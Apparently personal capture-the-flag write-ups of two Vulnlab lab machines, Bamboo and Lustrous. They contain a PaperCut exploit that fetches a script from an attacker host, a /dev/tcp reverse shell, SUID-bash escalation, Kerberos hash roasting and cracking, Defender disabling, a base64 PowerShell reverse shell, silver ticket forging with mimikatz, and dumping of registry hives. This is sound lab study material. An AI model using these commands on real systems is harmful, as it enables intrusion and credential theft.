vulnlab-bamboo

vulnlab bamboo

nmap scan

# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http

# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds

squidscan

┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan                     
Port 22 found!
8916 / 65535 [------->____________________________________________] 13.60% 1659 p/sPort 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
9707 / 65535 [------->____________________________________________] 14.81% 1678 p/sPort 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s

 

modified /etc/proxychains

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128

.

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
< 
* Connection #0 to host 10.10.79.83 left intact

Exploiting CVE-2023-27350

wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py

 

1st

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

2nd

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" 
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

s.sh contains:

#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1

 

catch the shell

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ 
zsh: suspended  rlwrap nc -nlvp 9001
                                                                                                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$ 

Let’s add our key to the authorized_keys file, to get a SSH shell

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$

we now do linpeas and pspy stuff on bamboo

ssh -i papercut papercut@10.10.79.83

 

privesc

There is an authentication bypass script in exploitdb https://www.exploit-db.com/exploits/51391 which is the same CVE as the one we started
We run it as follows and it will output what we need to do.

➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

The PaperCut NG instance running on port 9191 so let’s forward that port via SSH

papercut papercut@10.10.29.83 -L 9191:127.0.0.1:9191 -N

Browse to papercut

Click refresh servers to trigger the server-command

.

papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$ 

papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$ 
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash -p
bash-5.1# cd /rocd /root
cd /root
bash-5.1# ls    ls
ls
root.txt  snap
bash-5.1# cat rocat root.txt
cat root.txt
VL{48<redacted>26}
bash-5.1# 

That’s all.

 

 

vulnlab-lustrous

vulnlab lustrous

Lustrous, a medium chain AD machine involved two machines, LusMS and LusDC , from LusMS, accessing the ftp share there were usernames which out of which ben.cox didn’t require any pre-authentication, resulting in AS-REP roasting , having remote access to LusMS, local administrator password found in a form of secure string that can be converted back to plaintext, getting the system account and accessing the web application on LusDC, it required kerberos authentication in order to access the site, since there was a service account with a SPN, on performing kerberoasting , svc_web’s hash was cracked and with forging silver ticket as tony.ward who is a part of backup operator group, we can retrieve his password from the site and with impacket-reg  retrieving the SAM, SYSTEM and SECURITY file and then dumping NTDS.dit file with LusDC hash to get domain admin

Writeup:

Enum anonymous ftp finds 3 users

After this we take a look for kerberoastable users

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set

.

impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'

 

crack some hashes

The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt


.

Do some Bloodhound analysis, to find high valuable targets

bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp

.

$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


ServicePrincipalName    Name     MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc              svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             
http/lusdc.lustrous.vl  svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$e898fd0c2e9ea4fed53d9537a90e5c4daf043e597802909d35109f8891bc25e5a6aaaa6e2739e485425b244c3735913ff0f4426ce73c6021df92c557f4ab1eb6c481a657d26b801e18cc6af1cc789316f2045fc77e2cbaaf97aa6ae1fb7f26a0310bb149f06c2a65c3ba2315b3178d17669c8eb7a5c571f2bfaf5d0673dff09564526c9308ecc38663419cc55cc7f30ed1c7e8507f6b328284cfbf8911e9fcbfb57b4ccf0c5718e370450ab04b8c6e32fc9339fa3a3a9b349f9b6331d49a3bf080d8d1f94982d4aa87ec49de95d6efb283a196124c1b8cdd1a44c9b1201cf213a07dfb5ce2cda72465368796a991a4e25ed2165e9af342f39a06dd7acf1bcd8146036d64f8913c63c13c7c2ec8e15e3bcc364fc0a15bd8caef7ea023461fa8ddd6f734d2e5f5aa6ed2a544c09b05d653896e7a4c44d27ffba095be6aceec903378b6fc6ca41fc485fcaf5f041682a8c2a7510e23b827a542464e68002dee9cd17a5d09ca3f6b8a9d69fd34fcaa0eb35d36db5f47b9af13f8bac9ca2fe84eabb5858f8ba85864eed9b407c53426bbcde4742a66ac734365d4d72faa8d68e6db348b5e70c5abc6278dc474ab8d91fa45fc38447b470f3f5b480a3c27c34ffac8aff5e7cbed4dcb5ac4529cf42b0f3142d053879891bc224acece35f25164c38a9b2ab058bae92c0498051259c4cba97214aff005d8adba5a073be1cab0dc832abae307b04694c049bd52cf774829d4ae48c79abd188e373fb6108c351f12969e5badc2da61e0c0a0a063dbc637e08473d332fcccd8a3bbb45d5360bd2c11861fe94a290e357c18be4c2c0f849843f3e93ba81a34a1eca0661a7b24e7f3cb459cbd73a243d49b9357c70efcddabe13afa1d9778033681129046a8034b1dd26217dae4bde336b5871961623f2156515325888499f3a6cda70985981550d147f61f028040c9f6a6c78a8b9c406ca1b7d47ac14a25db13c48db0726f215c650723fd267dd9b832fda6700fc964c0df83369c4d21e475d69ac907d072b561aa6011a5bcca92d93ee834bee6619b3461bd9db8371cc6872b4adacadd07119dd3128073c03c110e1878f7d35e51eff75e15b774e5d0e7c775b94bf2a8c3dbac3ab7fa3f38670ed3b486f9c5a7245afa95550a43bd8dbd3d8923f18565a3899294dea285cc7f8e653a493283449cad01be0862053c1121563d7ebfb4e63e896e19d1216e31dde60e04e1b6ea383b7c6c8534c97c6ff9ebe5e0e5839cc0c267cebd21461b847c07285c6d99fe14b6d35b22b96f4242acd5d0668a1431d14a582b0a19a35bd657f29b230173fb9bf0a76ed88aff79947ebdc45ff4067c5aa96ccb37ff9633b9a77b4f241f8961334cbaec36007670f0e695a76c735a2cb4106ef6e2de129c964e8353b37db9d9cad57a0998979539ea8435ee2ed4ca05fbb7472e46a212a096f0bf75

.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt

.

winrm to lusms.lustrous.vl

evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'

On Ben’s Desktop, we found an xml representation of a PSCredential Object file named admin.xml.

following this blog post, we can extract the cleartext data from the file

.

*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
</Props>
</Obj>
</Objs>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List


UserName       : Administrator
Password       : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain         :



*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 

 

logon as Administrator, and make ben.cox an admin

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{40<redacted>48}

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.

Look around

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ xfreerdp  /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx

start edge, login to https://lusdc.lustrous.vl as ben.cox
and find the secure note.

We have also the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets

We go and disable windows defender and upload mimikatz, in our current powershell session , where we can store a new ticket for the administrator account

set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe

then we use mkpsrevshell.py

 

python3 mkpsrevshell.py 10.8.2.138 443

.

─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
Password:
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp

 

 

All in one

PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519 
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt      
Service   : http
Target    : lusdc.lustrous.vl
Lifetime  : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

PS C:\temp> whoami
nt authority\system
PS C:\temp> hostname
LusMS
PS C:\temp> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>	Client: tony.ward @ lustrous.vl
    Server: http/lusdc.lustrous.vl @ lustrous.vl
    KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 9/21/2024 18:04:01 (local)
    End Time:   9/19/2034 18:04:01 (local)
    Renew Time: 9/19/2034 18:04:01 (local)
    Session Key Type: RSADSI RC4-HMAC(NT)
    Cache Flags: 0 
    Kdc Called: 
PS C:\temp> 

PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

 

First we need the ntlm hash for the service account (svcweb)

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717

The following wmic command can be use to get  the SID of tony.ward. ( or we use bloodhound for this )

C:\Windows\system32>wmic useraccount where name='tony.ward' get sid 
SID S-1-5-21-2355092754-1584501958-1513963426-1114

The NTLM hash we then use in the rc4 parameter

kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http  /ptt

and request our target website

iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

This gives us u

We better do not use an Administrator account for this ( meaning we need to use another target in our case tony.ward to caft a silver ticket  for tony.ward

.

kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt

in Administrative cmd prompt:

C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user "lustrous\ben.cox" ...

C:\Windows\system32>

then

c:\temp>mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : http
Target    : LusDC.lustrous.vl
Lifetime  : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz # exit
Bye!

c:\temp>

.

c:\temp>klist                                                                                                                                                                                                                                   Current LogonId is 0:0x4900d

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content



<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>

<div class="table">
 
                                    <td>
                                        Password Reminder
                                    </td>
                                    <td>
                                        U_cPVQ<redacted>0i1X
                                    </td>
                                    <td>
                                        lustrous_tony.ward
                                    </td>
                                    <td>
                                        <a class="btn btn-danger" href="/Internal
        </table>
        <input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
    </div>
        <hr />
        <footer>
            <p>&copy; 2024 - SNotes</p>
        </footer>
    </div>
</body>
</html>

PS C:\temp>

.

PRIVESC

 

Logged in as Ben powershell right click run as user tony.ward

PS C:\Users\ben.cox> whoami
lustrous\tony.ward

PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: -2147483648
   \_ Inherited: False

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: 268435456
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: FullControl
   \_ Inherited: False

[*] Identity: BUILTIN\Backup Operators
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
PS C:\temp>


.

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl                        

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd windows\tasks
# ls
drw-rw-rw-          0  Sat Jul 27 13:51:14 2024 .
drw-rw-rw-          0  Sat May 27 20:32:06 2023 ..
-rw-rw-rw-      45056  Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw-      28672  Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw-   16965632  Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw-          6  Sat Jul 27 11:50:13 2024 SA.DAT
# mget *
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[*] Downloading SA.DAT
# 

or do it this way

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] ..snip..
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []

.

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb  
